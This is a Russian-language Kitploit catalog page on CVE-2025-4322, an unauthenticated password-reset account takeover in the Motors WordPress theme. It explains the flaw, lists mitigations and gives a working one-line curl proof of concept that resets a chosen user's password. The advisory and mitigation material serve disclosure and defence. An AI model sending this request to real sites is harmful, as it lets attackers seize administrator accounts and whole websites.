Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4322 — Motors <= 5.6.67 - Неаутентифицированное повышение привилегий через обновление пароля/захват учетной записи | Kitploit
Инструменты/GitHubGitHub/yucaerin/cve-2025-4322
Повышение привилегийАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и Образование
GitHubyucaerin/cve-2025-4322

CVE-2025-4322

Motors <= 5.6.67 - Неаутентифицированное повышение привилегий через обновление пароля/захват учетной записи

Репозиторий
1121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔐 CVE-2025-4322 – Motors <= 5.6.67 - Неаутентифицированное повышение привилегий через обновление пароля/захват учетной записи

📌 Информация о теме

  • Плагин: Motors <= 5.6.67 - Неаутентифицированное повышение привилегий через обновление пароля/захват учетной записи
  • Уязвимая версия: <= 5.6.67
  • CVE: CVE-2025-4322
  • Серьезность: 9.8 (Критическая)
  • CWE ID: CWE-620
  • Имя CWE: Непроверенная смена пароля
  • Исправлено: ✅ Да
  • Приоритет исправления: 🔴 Критический
  • Дата публикации: 19 мая 2025
  • Исследователь: https://www.wordfence.com/threat-intel/vulnerabilities/researchers/friderika-baranyai

⚠️ Краткое описание уязвимости

Тема WordPress Motors (до версии 5.6.67 включительно) содержит критическую ошибку аутентификации в функции сброса пароля.

Она предоставляет механизм обновления пароля через конечные точки на стороне клиента, но не выполняет надлежащую проверку личности пользователя или авторизации перед обработкой изменений пароля.

В результате неаутентифицированные злоумышленники могут отправлять специально сформированные HTTP-запросы, содержащие user_id, произвольный hash_check и новый пароль (stm_new_password), чтобы сбросить пароль любого пользователя, включая администраторов.

В случае эксплуатации это позволяет злоумышленникам:

  • Получить административный доступ,
  • Полностью захватить сайт,
  • Развернуть постоянные бэкдоры или вредоносные плагины.

Эта уязвимость особенно опасна, поскольку не требует входа в систему и часто не оставляет очевидных следов, если не вести мониторинг журналов.

🧪 Доказательство концепции (PoC)

📥 Запрос (например, через curl):

root@kitploit:~
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'

🛠️ В чем заключается уязвимость?

  • Тема Motors предоставляет обработчик сброса пароля на стороне клиента через конечные точки, такие как /login, /register, /loginregister и т.д.
  • Этот обработчик принимает user_id, hash_check и stm_new_password через неаутентифицированные HTTP POST-запросы
  • Тема не проверяет личность или подлинность запрашивающего
  • Пока злоумышленник предоставляет действительный или обходимый hash_check, система слепо обрабатывает изменения пароля
  • Перед обновлением учетных данных пользователя отсутствует аутентификация, проверка nonce или проверка владения

🔐 Рекомендации

  • Отключите или ограничьте доступ к /loginregister/ или аналогичным конечным точкам, если они не используются
  • Внедрите строгую проверку личности перед обработкой запросов на сброс пароля (например, проверка вошедшего пользователя, проверка безопасного токена)
  • Избегайте использования предоставленных клиентом user_id или hash_check без проверки на стороне сервера
  • Примените обновления до последней версии темы Motors или используйте виртуальное исправление (например, через WAF) для блокировки неавторизованных POST-запросов
  • Регулярно проверяйте общедоступные конечные точки на наличие неожиданного или недокументированного поведения

⚠️ Отказ от ответственности

Данный отчет предназначен только для образовательных и авторизованных целей тестирования безопасности.
Эксплуатация этой уязвимости без разрешения может нарушать правовые и этические границы.


Скачать инструмент